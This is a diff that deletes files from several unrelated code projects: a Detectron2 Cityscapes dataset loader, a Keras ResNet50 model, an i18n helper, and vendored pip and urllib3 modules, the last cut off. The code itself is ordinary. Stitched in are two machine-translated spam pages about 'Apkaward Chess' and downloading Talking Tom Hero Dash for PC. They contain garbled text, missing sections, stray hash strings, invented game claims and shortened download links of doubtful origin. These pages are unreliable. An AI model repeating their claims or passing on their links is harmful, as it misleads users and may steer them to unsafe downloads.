dataset. e.g., "~/cityscapes/leftImg8bit/train". - gt_dir (str): path to the raw annotations. e.g., - "~/cityscapes/gtFine/cityscapes_panoptic_train". - gt_json (str): path to the json file. e.g., - "~/cityscapes/gtFine/cityscapes_panoptic_train.json". - meta (dict): dictionary containing "thing_dataset_id_to_contiguous_id" - and "stuff_dataset_id_to_contiguous_id" to map category ids to - contiguous ids for training. - - Returns: - list[dict]: a list of dicts in Detectron2 standard format. (See - `Using Custom Datasets `_ ) - """ - - def _convert_category_id(segment_info, meta): - if segment_info["category_id"] in meta["thing_dataset_id_to_contiguous_id"]: - segment_info["category_id"] = meta["thing_dataset_id_to_contiguous_id"][ - segment_info["category_id"] - ] - else: - segment_info["category_id"] = meta["stuff_dataset_id_to_contiguous_id"][ - segment_info["category_id"] - ] - return segment_info - - assert os.path.exists( - gt_json - ), "Please run `python cityscapesscripts/preparation/createPanopticImgs.py` to generate label files." 
# noqa - with open(gt_json) as f: - json_info = json.load(f) - files = get_cityscapes_panoptic_files(image_dir, gt_dir, json_info) - ret = [] - for image_file, label_file, segments_info in files: - sem_label_file = ( - image_file.replace("leftImg8bit", "gtFine").split(".")[0] + "_labelTrainIds.png" - ) - segments_info = [_convert_category_id(x, meta) for x in segments_info] - ret.append( - { - "file_name": image_file, - "image_id": "_".join( - os.path.splitext(os.path.basename(image_file))[0].split("_")[:3] - ), - "sem_seg_file_name": sem_label_file, - "pan_seg_file_name": label_file, - "segments_info": segments_info, - } - ) - assert len(ret), f"No images found in {image_dir}!" - assert PathManager.isfile( - ret[0]["sem_seg_file_name"] - ), "Please generate labelTrainIds.png with cityscapesscripts/preparation/createTrainIdLabelImgs.py" # noqa - assert PathManager.isfile( - ret[0]["pan_seg_file_name"] - ), "Please generate panoptic annotation with python cityscapesscripts/preparation/createPanopticImgs.py" # noqa - return ret - - -_RAW_CITYSCAPES_PANOPTIC_SPLITS = { - "cityscapes_fine_panoptic_train": ( - "cityscapes/leftImg8bit/train", - "cityscapes/gtFine/cityscapes_panoptic_train", - "cityscapes/gtFine/cityscapes_panoptic_train.json", - ), - "cityscapes_fine_panoptic_val": ( - "cityscapes/leftImg8bit/val", - "cityscapes/gtFine/cityscapes_panoptic_val", - "cityscapes/gtFine/cityscapes_panoptic_val.json", - ), - # "cityscapes_fine_panoptic_test": not supported yet -} - - -def register_all_cityscapes_panoptic(root): - meta = {} - # The following metadata maps contiguous id from [0, #thing categories + - # #stuff categories) to their names and colors. We have to replica of the - # same name and color under "thing_*" and "stuff_*" because the current - # visualization function in D2 handles thing and class classes differently - # due to some heuristic used in Panoptic FPN. We keep the same naming to - # enable reusing existing visualization functions. - thing_classes = [k["name"] for k in CITYSCAPES_CATEGORIES] - thing_colors = [k["color"] for k in CITYSCAPES_CATEGORIES] - stuff_classes = [k["name"] for k in CITYSCAPES_CATEGORIES] - stuff_colors = [k["color"] for k in CITYSCAPES_CATEGORIES] - - meta["thing_classes"] = thing_classes - meta["thing_colors"] = thing_colors - meta["stuff_classes"] = stuff_classes - meta["stuff_colors"] = stuff_colors - - # There are three types of ids in cityscapes panoptic segmentation: - # (1) category id: like semantic segmentation, it is the class id for each - # pixel. Since there are some classes not used in evaluation, the category - # id is not always contiguous and thus we have two set of category ids: - # - original category id: category id in the original dataset, mainly - # used for evaluation. - # - contiguous category id: [0, #classes), in order to train the classifier - # (2) instance id: this id is used to differentiate different instances from - # the same category. For "stuff" classes, the instance id is always 0; for - # "thing" classes, the instance id starts from 1 and 0 is reserved for - # ignored instances (e.g. crowd annotation). - # (3) panoptic id: this is the compact id that encode both category and - # instance id by: category_id * 1000 + instance_id. 
- thing_dataset_id_to_contiguous_id = {} - stuff_dataset_id_to_contiguous_id = {} - - for k in CITYSCAPES_CATEGORIES: - if k["isthing"] == 1: - thing_dataset_id_to_contiguous_id[k["id"]] = k["trainId"] - else: - stuff_dataset_id_to_contiguous_id[k["id"]] = k["trainId"] - - meta["thing_dataset_id_to_contiguous_id"] = thing_dataset_id_to_contiguous_id - meta["stuff_dataset_id_to_contiguous_id"] = stuff_dataset_id_to_contiguous_id - - for key, (image_dir, gt_dir, gt_json) in _RAW_CITYSCAPES_PANOPTIC_SPLITS.items(): - image_dir = os.path.join(root, image_dir) - gt_dir = os.path.join(root, gt_dir) - gt_json = os.path.join(root, gt_json) - - DatasetCatalog.register( - key, lambda x=image_dir, y=gt_dir, z=gt_json: load_cityscapes_panoptic(x, y, z, meta) - ) - MetadataCatalog.get(key).set( - panoptic_root=gt_dir, - image_root=image_dir, - panoptic_json=gt_json, - gt_dir=gt_dir.replace("cityscapes_panoptic_", ""), - evaluator_type="cityscapes_panoptic_seg", - ignore_label=255, - label_divisor=1000, - **meta, - ) diff --git a/spaces/BIASLab/sars-cov-2-classification-fcgr/src/models/resnet50_9mers.py b/spaces/BIASLab/sars-cov-2-classification-fcgr/src/models/resnet50_9mers.py deleted file mode 100644 index 33bd3a807a5f20d4f6a78a82ad7dd0ba9addfe95..0000000000000000000000000000000000000000 --- a/spaces/BIASLab/sars-cov-2-classification-fcgr/src/models/resnet50_9mers.py +++ /dev/null @@ -1,103 +0,0 @@ -# https://github.com/c1ph3rr/Deep-Residual-Learning-for-Image-Recognition/blob/master/Resnet50.py -from pathlib import Path -from tensorflow.keras.models import Model -from tensorflow.keras.layers import ( - Input, - Conv2D, - Dense, - MaxPool2D, - GlobalAveragePooling2D, - Add, - Activation, - BatchNormalization, - ZeroPadding2D, -) - -# Reference name of model -MODEL_NAME = str(Path(__file__).resolve().stem) - -def identity_block(inp, filters, kernel_size, block, layer): - - f1, f2, f3 = filters - - conv_name = 'id_conv_b' + block + '_l' + layer - batch_name = 'id_batch_b' + block + '_l' + layer - - x = Conv2D(filters=f1, kernel_size=1, padding='same', kernel_initializer='he_normal', name=conv_name + '_a')(inp) - x = BatchNormalization(name=batch_name + '_a')(x) - x = Activation('relu')(x) - - x = Conv2D(filters=f2, kernel_size=kernel_size, padding='same', kernel_initializer='he_normal', name=conv_name + '_b')(x) - x = BatchNormalization(name=batch_name + '_b')(x) - x = Activation('relu')(x) - - x = Conv2D(filters=f3, kernel_size=1, padding='same', kernel_initializer='he_normal', name=conv_name + '_c')(x) - x = BatchNormalization(name=batch_name + '_c')(x) - - add = Add()([inp, x]) - x = Activation('relu')(add) - - return x - - -def convolutional_block(inp, filters, kernel_size, block, layer, strides=2): - - f1, f2, f3 = filters - - conv_name = 'res_conv_b' + block + '_l' + layer - batch_name = 'res_batch_b' + block + '_l' + layer - - y = Conv2D(filters=f1, kernel_size=1, padding='same', strides=strides, kernel_initializer='he_normal', name=conv_name + '_a')(inp) - y = BatchNormalization(name=batch_name + '_a')(y) - y = Activation('relu')(y) - - y = Conv2D(filters=f2, kernel_size=kernel_size, padding='same', kernel_initializer='he_normal', name=conv_name + '_b')(y) - y = BatchNormalization(name=batch_name + '_b')(y) - y = Activation('relu')(y) - - y = Conv2D(filters=f3, kernel_size=1, padding='same', kernel_initializer='he_normal', name=conv_name + '_c')(y) - y = BatchNormalization(name=batch_name + '_c')(y) - - shortcut = Conv2D(filters=f3, kernel_size=1, strides=strides, 
kernel_initializer='he_normal', name=conv_name + '_shortcut')(inp) - shortcut = BatchNormalization(name=batch_name + '_shortcut')(shortcut) - - add = Add()([shortcut, y]) - y = Activation('relu')(add) - - return y - -def get_model(n_outputs): - - inp = Input(shape=(512, 512, 1), name='input') - padd = ZeroPadding2D(3)(inp) - - conv1 = Conv2D(64, 7, strides=2, padding='valid', name='conv1')(padd) - conv1 = BatchNormalization(name='batch2')(conv1) - conv1 = Activation('relu')(conv1) - conv1 = ZeroPadding2D(1)(conv1) - conv1 = MaxPool2D(3, 2)(conv1) - - conv2 = convolutional_block(conv1, [64,64,256], 3, '2', '1', strides=1) - conv2 = identity_block(conv2, [64,64,256], 3, '2', '2') - conv2 = identity_block(conv2, [64,64,256], 3, '2', '3') - - conv3 = convolutional_block(conv2, [128,128,512], 3, '3', '1') - conv3 = identity_block(conv3, [128,128,512], 3, '3', '2') - conv3 = identity_block(conv3, [128,128,512], 3, '3', '3') - conv3 = identity_block(conv3, [128,128,512], 3, '3', '4') - - conv4 = convolutional_block(conv3, [256,256,1024], 3, '4', '1') - conv4 = identity_block(conv4, [256,256,1024], 3, '4', '2') - conv4 = identity_block(conv4, [256,256,1024], 3, '4', '3') - conv4 = identity_block(conv4, [256,256,1024], 3, '4', '4') - conv4 = identity_block(conv4, [256,256,1024], 3, '4', '5') - conv4 = identity_block(conv4, [256,256,1024], 3, '4', '6') - - conv5 = convolutional_block(conv4, [512,512,2048], 3, '5', '1') - conv5 = identity_block(conv5, [512,512,2048], 3, '5', '2') - conv5 = identity_block(conv5, [512,512,2048], 3, '5', '3') - - avg_pool = GlobalAveragePooling2D()(conv5) - out = Dense(n_outputs, activation='softmax')(avg_pool) - - return Model(inp, out) \ No newline at end of file diff --git a/spaces/Bart92/RVC_HF/i18n.py b/spaces/Bart92/RVC_HF/i18n.py deleted file mode 100644 index b958c6f7244c4b920e097a9a9e67e81990d03f59..0000000000000000000000000000000000000000 --- a/spaces/Bart92/RVC_HF/i18n.py +++ /dev/null @@ -1,43 +0,0 @@ -import json - -def load_language_list(language): - try: - with open(f"./i18n/locale/{language}.json", "r", encoding="utf-8") as f: - return json.load(f) - except FileNotFoundError: - raise FileNotFoundError( - f"Failed to load language file for {language}. Check if the correct .json file exists." - ) - - -class I18nAuto: - """ - A class used for internationalization using JSON language files. - - Examples - -------- - >>> i18n = I18nAuto('en_US') - >>> i18n.print() - Using Language: en_US - """ - def __init__(self, language=None): - from locale import getdefaultlocale - language = language or getdefaultlocale()[0] - if not self._language_exists(language): - language = "en_US" - - self.language_map = load_language_list(language) - self.language = language - - @staticmethod - def _language_exists(language): - from os.path import exists - return exists(f"./i18n/locale/{language}.json") - - def __call__(self, key): - """Returns the translation of the given key if it exists, else returns the key itself.""" - return self.language_map.get(key, key) - - def print(self): - """Prints the language currently in use.""" - print(f"Using Language: {self.language}") \ No newline at end of file diff --git a/spaces/Benson/text-generation/Examples/Apkaward Chess.md b/spaces/Benson/text-generation/Examples/Apkaward Chess.md deleted file mode 100644 index ce6eb247892e0dea0500a608e1d3dd988f0be937..0000000000000000000000000000000000000000 --- a/spaces/Benson/text-generation/Examples/Apkaward Chess.md +++ /dev/null @@ -1,55 +0,0 @@ - -

Apkaward Chess: A New Way to Play Chess Online

-

If you are a chess fan looking for a new way to play online, you may want to take a look at Apkaward Chess. This is a chess game featuring 5D chess with multiverse time travel, based on the popular game 5D Chess with Multiverse Time Travel by Thunkspace. In this article, we will tell you what Apkaward is, what Apkaward Chess is, how to play it, what the rules of 5D chess are, and why you should play it.

-

What is Apkaward?

-

Apkaward is a website that offers free and paid games for Android devices. You can find a variety of games in different genres, such as action, adventure, puzzle, and more. You can also download modded versions of some games, which give you unlimited resources or unlocked features. Some of the games available on Apkaward are Minecraft PE, GTA San Andreas, PUBG Mobile, and more.

-

apkaward chess


DOWNLOAD >>> https://bltlly.com/2v6Mjt



-

Apkaward also has a YouTube channel where they showcase their games and how to download them. You can watch their videos to see what the games look and play like, and to get the links to download them. You can also subscribe to their channel to be notified of their latest uploads.

-

What is Apkaward Chess?

-

Apkaward Chess is one of the games available on Apkaward. It is a chess game featuring 5D chess with multiverse time travel. This means you can move your pieces not only across the board, but also across turns and timelines. You can create new timelines by moving your pieces backwards in time or sideways in time. You can also capture pieces from other timelines or send your pieces to other timelines. The goal is to checkmate your opponent's king on any timeline.

- -

How to play Apkaward Chess?

-

Apkaward Chess can be downloaded from the Apkaward website or the YouTube channel. You can find the links to both in the references below. Once you have downloaded the APK file, you need to install it on your device. You may need to enable the installation of apps from unknown sources in your settings. After that, you can launch the game and start playing.

-

Apkaward Chess can be played offline or online against other players or an AI. You can choose between different difficulty levels and game modes. You can also customize the board and the pieces to your liking. The game has a tutorial mode that teaches you the basics of 5D chess and how to use the interface. You can also access the help menu at any time during the game for more information.

-

Apkaward Chess has the same rules as 5D Chess with Multiverse Time Travel, which are explained in the next section.

-

What are the Rules of 5D Chess with Multiverse Time Travel?

-

5D Chess with Multiverse Time Travel is a chess variant that introduces two additional axes of movement: the turn axis and the timeline axis. All pieces keep their standard chess movement abilities, but they can also move across turns and timelines. The game starts from a normal chess setup, but as it progresses it becomes increasingly complex through a series of alternative timelines that the player can take advantage of.

-

The turn axis is represented by a horizontal row of boards, each corresponding to a different turn in the game. The timeline axis is represented by a vertical column of boards, each corresponding to a different timeline in the game. The main timeline is the one that starts from the initial position and follows the moves made by both players. Alternative timelines are created when a piece moves backwards in time or sideways in time.
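To picture this layout, here is a minimal, hypothetical Python sketch (not code from the game itself) of how a multiverse of boards could be indexed by timeline and turn; the board representation and names are assumptions made for illustration only:

```python
# Hypothetical illustration only: index each 8x8 board by (timeline, turn).
from typing import Dict, List, Tuple

Board = List[List[str]]  # 8x8 grid of piece codes, "" for an empty square

def empty_board() -> Board:
    return [["" for _ in range(8)] for _ in range(8)]

# The multiverse is a sparse grid of boards: rows are timelines, columns are turns.
multiverse: Dict[Tuple[int, int], Board] = {}
multiverse[(0, 0)] = empty_board()   # main timeline, starting position
multiverse[(0, 0)][0][4] = "wK"      # white king on e1
multiverse[(1, 5)] = empty_board()   # a branch timeline created at turn 5

print(sorted(multiverse.keys()))     # [(0, 0), (1, 5)]
```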

-

- -

The goal of the game is to checkmate your opponent's king on any timeline. However, there are some additional rules and concepts you need to keep in mind:

-
    -
  • A piece can only move backwards in time or sideways in time if it does not create a paradox. A paradox occurs when a piece moves to a position where it would have been captured or blocked by itself or another piece on an earlier turn or timeline.
  • -
  • A piece can capture another piece from any timeline, as long as it does not create a paradox. Capturing a piece from another timeline removes it from all later boards where it would have existed.
  • -
  • A piece can give check or checkmate from any timeline, as long as it is visible from the current board. A piece is visible if no other piece is blocking its line of sight across turns and timelines.
  • -
  • A player can move their king out of check by moving it on the board, moving it across turns or timelines, or moving another piece to block or capture the attacker.
  • -
  • A player cannot make a move that would put their king in check on any timeline, even if it is not visible from the current board.
  • -
  • A player cannot make a move that creates an infinite loop of timelines. An infinite loop occurs when a piece moves backwards in time or sideways in time to a position where it has already been before.
  • -
-

These are the basic rules of 5D chess, but there are more advanced concepts and strategies you can learn as you play. You can also check the official website of 5D Chess with Multiverse Time Travel for more details and examples.
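As a rough illustration of the bookkeeping these rules imply, here is a small, hypothetical Python sketch (not the game's real logic) that classifies a move by whether it stays on one board, travels back in time, or jumps sideways to another timeline; all names and coordinates are assumptions for the example:

```python
from dataclasses import dataclass

@dataclass(frozen=True)
class Square:
    timeline: int  # which timeline the board belongs to
    turn: int      # which turn (time step) the board represents
    file: int      # 0-7 for files a-h
    rank: int      # 0-7 for ranks 1-8

@dataclass(frozen=True)
class Move:
    piece: str
    source: Square
    target: Square

    def kind(self) -> str:
        if self.target.turn < self.source.turn:
            return "time travel"    # lands on an earlier turn, which would branch a new timeline
        if self.target.timeline != self.source.timeline:
            return "timeline jump"  # moves sideways to a parallel timeline
        return "ordinary"           # stays on the current board

# Example: a knight on the main timeline (0) jumps from turn 10 back to turn 8.
move = Move("N", Square(0, 10, 6, 0), Square(0, 8, 5, 2))
print(move.kind())  # time travel
```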

-

Why play Apkaward Chess?

- -

Apkaward Chess is also a unique and innovative game that offers a new way to play chess online. You can play against other players from around the world who have downloaded Apkaward Chess, or against an AI that adapts to your skill level. You can also chat with your opponents and share your tips and tricks with them. You can also customize the game's settings and preferences to suit your style and mood.

-

Apkaward Chess is a free game that you can enjoy on your Android device anytime, anywhere. You don't need an Internet connection to play offline, and you don't need to pay anything to download or play the game. You can also update the game regularly to get new features and improvements.

-

Conclusion

-

Apkaward Chess is a new way to play chess online that features 5D chess with multiverse time travel. It is based on the popular game 5D Chess with Multiverse Time Travel by Thunkspace, which is available for Windows, macOS, and Linux. Apkaward Chess can be downloaded for free from the Apkaward website or the YouTube channel, and it can be played offline or online against other players or an AI. Apkaward Chess is a fun and challenging game that tests your strategic thinking and creativity, as well as a unique and innovative game that offers a new dimension of chess. If you are a chess fan looking for a new way to play online, you should give Apkaward Chess a try!

-

Frequently Asked Questions

-

What is the difference between 5D chess and standard chess?

-

5D chess is a chess variant that introduces two additional axes of movement: the turn axis and the timeline axis. This means you can move your pieces not only on the board, but also across turns and timelines. You can create new timelines by moving your pieces backwards in time or sideways in time. You can also capture pieces from other timelines or send your pieces to other timelines. The goal is to checkmate your opponent's king on any timeline.

- -

You can download Apkaward Chess from the Apkaward website or the YouTube channel. You can find the links to both in the references below. Once you have downloaded the APK file, you need to install it on your device. You may need to enable the installation of apps from unknown sources in your settings. After that, you can launch the game and start playing.

-

How do I play Apkaward Chess online?

-

You can play Apkaward Chess online against other players or an AI. You need an Internet connection to play online. You can choose between different difficulty levels and game modes. You can also chat with your opponents and share your tips and tricks with them.

-

How do I learn the rules of 5D chess?

-

You can learn the rules of 5D chess by playing the tutorial mode in Apkaward Chess. This mode teaches you the basics of 5D chess and how to use the interface. You can also access the help menu at any time during the game for more information. You can also check the official website of 5D Chess with Multiverse Time Travel for more details and examples.

-

What are some tips and tricks for playing 5D chess?

-

Some tips and tricks for playing 5D chess are:

-
    -
  • Plan your moves ahead and consider how they will affect not only your current position, but also your past and future positions, as well as your opponent's moves across turns and timelines.
  • -
  • Use your pieces' ability to move across turns and timelines to create new opportunities or avoid threats. You can also use them to confuse or surprise your opponent.
  • -
  • Be careful not to create paradoxes or infinite loops when moving your pieces across turns and timelines. These moves are illegal and will result in a loss.
  • -
  • Keep track of all possible checks and checkmates from any timeline, even if they are not visible from the current board. You can use the interface to view all the boards in the game.
  • - -

64aa2da5cf
-
-
\ No newline at end of file diff --git a/spaces/Benson/text-generation/Examples/Descargar El Juego Talking Tom Hero Dash Para PC.md b/spaces/Benson/text-generation/Examples/Descargar El Juego Talking Tom Hero Dash Para PC.md deleted file mode 100644 index 24e851d14611c8602120efd6d8e2c55e4e0347b0..0000000000000000000000000000000000000000 --- a/spaces/Benson/text-generation/Examples/Descargar El Juego Talking Tom Hero Dash Para PC.md +++ /dev/null @@ -1,85 +0,0 @@ -
-

Talking Tom Hero Dash: A Fun and Action-Packed Game for PC

-

Do you love playing games on your PC? Do you like running, jumping, and saving the world with your favorite characters? If you answered yes, then you should try Talking Tom Hero Dash, a popular and exciting game that you can download and play on your PC. In this article, we will tell you what Talking Tom Hero Dash is, how to download it for PC, and why you should play it on your computer.

-

Download the Talking Tom Hero Dash game for PC


Download File ✸✸✸ https://bltlly.com/2v6JNF



-

What is Talking Tom Hero Dash?

-

Talking Tom Hero Dash is a game developed by Outfit7 Limited, the creators of My Talking Tom, My Talking Angela, and Talking Tom Gold Run. It is an endless runner game featuring Talking Tom and his friends as superheroes who have to stop the evil Rakoonz from destroying the world.

-

The story and the gameplay

-The Rakoonz have captured Angela, Ben, Hank, and Ginger, and it is up to Tom to save them. To do so, he has to run and chase them through different locations, such as lost temples, ancient cities, desert dunes, and snowy peaks. Along the way, he has to dodge obstacles, collect coins and gems, use power-ups and gadgets, and fight the Rakoonz. He can also unlock new outfits and upgrade his abilities as he progresses.

-

The features and the graphics

-

Talking Tom Hero Dash has many features that make it fun and engaging. For example, you can play with different characters, each with their own special powers. You can also complete missions and events to earn rewards and unlock new worlds. You can also watch videos of Outfit7's animated characters on YouTube within the game. The game also has amazing graphics that are colorful, vibrant, and detailed. The animations are smooth and realistic, and the sound effects are lively and immersive.

-

How to download Talking Tom Hero Dash for PC?

-

There are several ways to download Talking Tom Hero Dash for PC. Here are some of them:

- -

The easiest way to download Talking Tom Hero Dash for PC is from the Microsoft Store. All you need is a Windows 10 device and an Internet connection. Here are the steps:

-

-
    -
  1. Open the Microsoft Store app on your PC.
  2. -
  3. Search for "Talking Tom Hero Dash" in the search bar.
  4. -
  5. Select the game from the results and click "Get" or "Buy" depending on whether it is free or paid.
  6. -
  7. Wait for the download and installation to finish.
  8. -
  9. Launch the game from your Start menu or desktop.
  10. -
-

Download from a third-party platform

-

Another way to download Talking Tom Hero Dash for PC is from a third-party platform such as Steam or the Epic Games Store. These are digital distribution platforms that let you buy and download games for your PC. You will first need to create an account and install their launcher on your PC. Here are the steps:

-
    -
  1. Go to the website of the platform you want to use (for example, [Steam]( 4 ) or [Epic Games Store]( 5 )).
  2. -
  3. Create an account or sign in with an existing one.
  4. -
  5. Download and install their launcher on your PC.
  6. -
  7. Open the launcher and search for "Talking Tom Hero Dash" in its store.
  8. -
  9. Select the game from the results and click "Add to Cart" or "Get" depending on whether it is free or paid.
  10. -
  11. Proceed to pay for the game if required.
  12. -
  13. Wait for the download and installation to finish. Launch the game from the launcher or your desktop.
  14. -
-

Download from the official website

-

The third way to download Talking Tom Hero Dash for PC is from the official website of Outfit7 Limited. This is the most direct and reliable way to get the game, but it may require more steps and technical skills. Here are the steps:

-
    -
  1. Go to the [official website] of Outfit7 Limited.
  2. -
  3. Haga clic en "Juegos" y seleccione "Talking Tom Hero Dash" de la lista.
  4. - -
  5. Guarde el archivo en su PC y ejecútelo como administrador.
  6. -
  7. Siga las instrucciones en la pantalla para instalar el juego.
  8. -
  9. Inicie el juego desde su escritorio o menú Inicio.
  10. -
-

Why play Talking Tom Hero Dash on PC?

-

Now that you know how to download Talking Tom Hero Dash for PC, you may be wondering why you should play it on your computer instead of your mobile device. Well, there are many reasons why playing PC games can be more enjoyable and rewarding than playing mobile games. Here are some of them:

-

The benefits of playing PC games

-

Playing PC games can have many benefits for your health, skills, and mood. For example, playing PC games can:

-
    -
  • Improve your cognitive skills, such as memory, attention, problem-solving, and creativity.
  • -
  • Improve your hand-eye coordination, reaction time, and spatial awareness.
  • -
  • Reduce your stress, anxiety, and depression, and boost your happiness and self-esteem.
  • -
  • Boost your social skills, communication, and teamwork, especially if you play online or with friends.
  • -
  • Educate you about different topics, cultures, and perspectives, and inspire you to learn more.
  • -
-

The advantages of playing Talking Tom Hero Dash on PC

Playing Talking Tom Hero Dash on PC can also have some specific advantages over playing it on your mobile device. For example, playing Talking Tom Hero Dash on PC can:

  • Give you a bigger and better screen, which can improve visibility, immersion, and enjoyment.
  • Offer smoother and faster performance, which helps prevent lag, crashes, or freezes.
  • Provide more control options, such as a keyboard, mouse, or controller, to suit your preferences and comfort.
  • Save battery and storage space on your mobile device, which can extend its lifespan and usefulness.

Conclusion

Talking Tom Hero Dash is a fun, action-packed game that you can download and play on your PC. It has a captivating story, exciting gameplay, and impressive graphics, along with many features that make it engaging and entertaining. You can download it from the Microsoft Store, a third-party platform, or the official website, and enjoy the many benefits and advantages of playing it on your PC. So what are you waiting for? Download Talking Tom Hero Dash for PC today and join Tom and his friends on their heroic adventure!

Frequently asked questions

Here are some frequently asked questions about Talking Tom Hero Dash:

Q: Is Talking Tom Hero Dash free to play?

A: Yes, Talking Tom Hero Dash is free to play on all platforms. However, it may contain in-app purchases that let you buy coins, gems, and other items with real money.

Q: Is Talking Tom Hero Dash safe for kids?

A: Yes, Talking Tom Hero Dash is safe for kids. It is rated 4+ on the Microsoft Store and 9+ on the App Store, and it contains no violence, gore, or profanity. However, it may show ads or links that lead to other websites or apps that may not be suitable for children, so parental guidance is recommended.

Q: How can I get more coins and gems in Talking Tom Hero Dash?

A: There are many ways to get more coins and gems in Talking Tom Hero Dash. For example, you can:

  • Run as far as you can and collect them along the way.
  • Complete missions and events to earn them as rewards.
  • Watch videos or ads to get them for free.
  • Become a VIP member.
  • Buy them with real money if you want.

Q: How can I unlock new characters and outfits in Talking Tom Hero Dash?

Q: How can I update Talking Tom Hero Dash on PC?

A: To update Talking Tom Hero Dash on PC, check whether a new version is available on the platform you downloaded it from. If there is, follow the on-screen instructions to download and install the update. Alternatively, you can uninstall the game and reinstall the latest version.

-
-
\ No newline at end of file diff --git a/spaces/Big-Web/MMSD/env/Lib/site-packages/pip/_vendor/resolvelib/structs.py b/spaces/Big-Web/MMSD/env/Lib/site-packages/pip/_vendor/resolvelib/structs.py deleted file mode 100644 index 359a34f60187591c26ee46d60e49c136acd6c765..0000000000000000000000000000000000000000 --- a/spaces/Big-Web/MMSD/env/Lib/site-packages/pip/_vendor/resolvelib/structs.py +++ /dev/null @@ -1,170 +0,0 @@ -import itertools - -from .compat import collections_abc - - -class DirectedGraph(object): - """A graph structure with directed edges.""" - - def __init__(self): - self._vertices = set() - self._forwards = {} # -> Set[] - self._backwards = {} # -> Set[] - - def __iter__(self): - return iter(self._vertices) - - def __len__(self): - return len(self._vertices) - - def __contains__(self, key): - return key in self._vertices - - def copy(self): - """Return a shallow copy of this graph.""" - other = DirectedGraph() - other._vertices = set(self._vertices) - other._forwards = {k: set(v) for k, v in self._forwards.items()} - other._backwards = {k: set(v) for k, v in self._backwards.items()} - return other - - def add(self, key): - """Add a new vertex to the graph.""" - if key in self._vertices: - raise ValueError("vertex exists") - self._vertices.add(key) - self._forwards[key] = set() - self._backwards[key] = set() - - def remove(self, key): - """Remove a vertex from the graph, disconnecting all edges from/to it.""" - self._vertices.remove(key) - for f in self._forwards.pop(key): - self._backwards[f].remove(key) - for t in self._backwards.pop(key): - self._forwards[t].remove(key) - - def connected(self, f, t): - return f in self._backwards[t] and t in self._forwards[f] - - def connect(self, f, t): - """Connect two existing vertices. - - Nothing happens if the vertices are already connected. - """ - if t not in self._vertices: - raise KeyError(t) - self._forwards[f].add(t) - self._backwards[t].add(f) - - def iter_edges(self): - for f, children in self._forwards.items(): - for t in children: - yield f, t - - def iter_children(self, key): - return iter(self._forwards[key]) - - def iter_parents(self, key): - return iter(self._backwards[key]) - - -class IteratorMapping(collections_abc.Mapping): - def __init__(self, mapping, accessor, appends=None): - self._mapping = mapping - self._accessor = accessor - self._appends = appends or {} - - def __repr__(self): - return "IteratorMapping({!r}, {!r}, {!r})".format( - self._mapping, - self._accessor, - self._appends, - ) - - def __bool__(self): - return bool(self._mapping or self._appends) - - __nonzero__ = __bool__ # XXX: Python 2. - - def __contains__(self, key): - return key in self._mapping or key in self._appends - - def __getitem__(self, k): - try: - v = self._mapping[k] - except KeyError: - return iter(self._appends[k]) - return itertools.chain(self._accessor(v), self._appends.get(k, ())) - - def __iter__(self): - more = (k for k in self._appends if k not in self._mapping) - return itertools.chain(self._mapping, more) - - def __len__(self): - more = sum(1 for k in self._appends if k not in self._mapping) - return len(self._mapping) + more - - -class _FactoryIterableView(object): - """Wrap an iterator factory returned by `find_matches()`. - - Calling `iter()` on this class would invoke the underlying iterator - factory, making it a "collection with ordering" that can be iterated - through multiple times, but lacks random access methods presented in - built-in Python sequence types. 
- """ - - def __init__(self, factory): - self._factory = factory - self._iterable = None - - def __repr__(self): - return "{}({})".format(type(self).__name__, list(self)) - - def __bool__(self): - try: - next(iter(self)) - except StopIteration: - return False - return True - - __nonzero__ = __bool__ # XXX: Python 2. - - def __iter__(self): - iterable = ( - self._factory() if self._iterable is None else self._iterable - ) - self._iterable, current = itertools.tee(iterable) - return current - - -class _SequenceIterableView(object): - """Wrap an iterable returned by find_matches(). - - This is essentially just a proxy to the underlying sequence that provides - the same interface as `_FactoryIterableView`. - """ - - def __init__(self, sequence): - self._sequence = sequence - - def __repr__(self): - return "{}({})".format(type(self).__name__, self._sequence) - - def __bool__(self): - return bool(self._sequence) - - __nonzero__ = __bool__ # XXX: Python 2. - - def __iter__(self): - return iter(self._sequence) - - -def build_iter_view(matches): - """Build an iterable view from the value returned by `find_matches()`.""" - if callable(matches): - return _FactoryIterableView(matches) - if not isinstance(matches, collections_abc.Sequence): - matches = list(matches) - return _SequenceIterableView(matches) diff --git a/spaces/Big-Web/MMSD/env/Lib/site-packages/urllib3/util/wait.py b/spaces/Big-Web/MMSD/env/Lib/site-packages/urllib3/util/wait.py deleted file mode 100644 index 21b4590b3dc9b58902b0d47164b9023e54a85ef8..0000000000000000000000000000000000000000 --- a/spaces/Big-Web/MMSD/env/Lib/site-packages/urllib3/util/wait.py +++ /dev/null @@ -1,152 +0,0 @@ -import errno -import select -import sys -from functools import partial - -try: - from time import monotonic -except ImportError: - from time import time as monotonic - -__all__ = ["NoWayToWaitForSocketError", "wait_for_read", "wait_for_write"] - - -class NoWayToWaitForSocketError(Exception): - pass - - -# How should we wait on sockets? -# -# There are two types of APIs you can use for waiting on sockets: the fancy -# modern stateful APIs like epoll/kqueue, and the older stateless APIs like -# select/poll. The stateful APIs are more efficient when you have a lots of -# sockets to keep track of, because you can set them up once and then use them -# lots of times. But we only ever want to wait on a single socket at a time -# and don't want to keep track of state, so the stateless APIs are actually -# more efficient. So we want to use select() or poll(). -# -# Now, how do we choose between select() and poll()? On traditional Unixes, -# select() has a strange calling convention that makes it slow, or fail -# altogether, for high-numbered file descriptors. The point of poll() is to fix -# that, so on Unixes, we prefer poll(). -# -# On Windows, there is no poll() (or at least Python doesn't provide a wrapper -# for it), but that's OK, because on Windows, select() doesn't have this -# strange calling convention; plain select() works fine. -# -# So: on Windows we use select(), and everywhere else we use poll(). We also -# fall back to select() in case poll() is somehow broken or missing. - -if sys.version_info >= (3, 5): - # Modern Python, that retries syscalls by default - def _retry_on_intr(fn, timeout): - return fn(timeout) - -else: - # Old and broken Pythons. 
